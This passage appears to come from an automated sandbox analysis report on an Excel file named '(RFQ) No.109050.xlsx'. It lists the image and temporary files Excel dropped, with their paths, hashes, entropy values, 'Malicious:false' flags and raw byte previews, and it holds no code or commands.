                                              Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A4E0740.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6815
                                              Entropy (8bit):7.871668067811304
                                              Encrypted:false
                                              SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                              MD5:E2267BEF7933F02C009EAEFC464EB83D
                                              SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                              SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                              SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                              Malicious:false
                                              Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B379A2D.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                              Category:dropped
                                              Size (bytes):85020
                                              Entropy (8bit):7.2472785111025875
                                              Encrypted:false
                                              SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                              MD5:738BDB90A9D8929A5FB2D06775F3336F
                                              SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                              SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                              SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                              Malicious:false
                                              Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39A93B7B.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):49744
                                              Entropy (8bit):7.99056926749243
                                              Encrypted:true
                                              SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                              MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                              SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                              SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                              SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                              Malicious:false
                                              Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45F1FF87.emf
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):648132
                                              Entropy (8bit):2.8123660050383266
                                              Encrypted:false
                                              SSDEEP:3072:u34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:g4UcLe0JOcXuunhqcS
                                              MD5:E48BF4960F779FF5CD42B9143833B42F
                                              SHA1:7DA5EF13228B3557115ADFAA174E30339B3BB83A
                                              SHA-256:D7AE3B836541DA12D810FA9F15513160FE1CD7F362364A5579058DCAC07D8D0A
                                              SHA-512:F899C259D8BC55392116F12F0BF652358562948037754E17BFABEEF89FAA1B22A60D398249B1B21F5E0845F9691BD70CD5727FBC37257465FC590BD15CF5F25B
                                              Malicious:false
                                              Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................DY$...T.S.-zMY.@..%...0.S.t.S.......S.X.S..N.Z..S...S.....@.S...S..N.Z..S...S. ....yMY..S...S. ............zMY........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........d.S.X.....S...S............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\480E59C3.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                              Category:dropped
                                              Size (bytes):14198
                                              Entropy (8bit):7.916688725116637
                                              Encrypted:false
                                              SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                              MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                              SHA1:72CA86D260330FC32246D28349C07933E427065D
                                              SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                              SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                              Malicious:false
                                              Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E372F4E.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):84203
                                              Entropy (8bit):7.979766688932294
                                              Encrypted:false
                                              SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                              MD5:208FD40D2F72D9AED77A86A44782E9E2
                                              SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                              SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                              SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                              Malicious:false
                                              Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67A5C24A.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                              Category:dropped
                                              Size (bytes):8815
                                              Entropy (8bit):7.944898651451431
                                              Encrypted:false
                                              SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                              MD5:F06432656347B7042C803FE58F4043E1
                                              SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                              SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                              SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                              Malicious:false
                                              Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CC89F36.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):33795
                                              Entropy (8bit):7.909466841535462
                                              Encrypted:false
                                              SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                              MD5:613C306C3CC7C3367595D71BEECD5DE4
                                              SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                              SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                              SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                              Malicious:false
                                              Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A26CB4E2.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                              Category:dropped
                                              Size (bytes):14198
                                              Entropy (8bit):7.916688725116637
                                              Encrypted:false
                                              SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                              MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                              SHA1:72CA86D260330FC32246D28349C07933E427065D
                                              SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                              SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                              Malicious:false
                                              Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1E599BF.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):84203
                                              Entropy (8bit):7.979766688932294
                                              Encrypted:false
                                              SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                              MD5:208FD40D2F72D9AED77A86A44782E9E2
                                              SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                              SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                              SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                              Malicious:false
                                              Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DEB48925.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                              Category:dropped
                                              Size (bytes):8815
                                              Entropy (8bit):7.944898651451431
                                              Encrypted:false
                                              SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                              MD5:F06432656347B7042C803FE58F4043E1
                                              SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                              SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                              SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                              Malicious:false
                                              Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E17CBBC9.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6815
                                              Entropy (8bit):7.871668067811304
                                              Encrypted:false
                                              SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                              MD5:E2267BEF7933F02C009EAEFC464EB83D
                                              SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                              SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                              SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                              Malicious:false
                                              Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED48C3DC.emf
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):7788
                                              Entropy (8bit):5.5374935868044926
                                              Encrypted:false
                                              SSDEEP:96:wQ2CHOvlJaX1/0qMfZoL/GuoOfaDda/ZbjsSZdb3Cim3n+KeXI:wdTrZuloOSGZboS/C93n+KuI
                                              MD5:4FC415C6424FF953F66A5D5E8BDEC1CA
                                              SHA1:DBB592681E36BB66D6FB8715CF9AFC38E4E73944
                                              SHA-256:AEADE713C14333879F98061E55CF9AF0C211A279A66601DA979D00D41FEFF6EA
                                              SHA-512:40225FAA118A318C4B53D74E5C4B1C6373CD95726DEB8A6FCFD81517B781C43C97B1410089DABDD51E04612921EA4B5DD6094168483233474C94F64EE78CA431
                                              Malicious:false
                                              Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................;.6.).X.......d.......................@.....p....\.....................p........<5.u..p....`.p`m;.$y.w..D................w..D.$.......d.......$....^.p.....^.p..D...D...C.....-........<.w................<.9u.Z.v....X.a....`m;........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F219DE41.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):33795
                                              Entropy (8bit):7.909466841535462
                                              Encrypted:false
                                              SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                              MD5:613C306C3CC7C3367595D71BEECD5DE4
                                              SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                              SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                              SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                              Malicious:false
                                              Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                              C:\Users\user\Desktop\~$(RFQ) No.109050.xlsx
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):330
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
